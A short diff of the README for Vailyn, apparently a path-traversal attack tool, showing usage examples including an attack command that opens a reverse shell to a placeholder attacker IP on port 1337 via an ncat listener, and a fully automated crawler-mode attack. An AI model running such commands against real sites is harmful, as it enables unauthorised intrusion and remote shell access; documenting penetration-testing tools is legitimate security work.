VainlyStrain/Vailyn/README.md

 * Attack, but I want a reverse shell on port 1337:
 `$ Vailyn -v "http://site.com/download.php" -a 1 -l dicts/files dicts/dirs -j MY.IP.IS.XX 1337`
-(will start a ncat listener for you)
+(will start a ncat listener for you if on Unix)

 * Full automation in crawler mode:
 `$ Vailyn -v "http://root-url.site" -a 5` _you can also specify depths, lookup file here_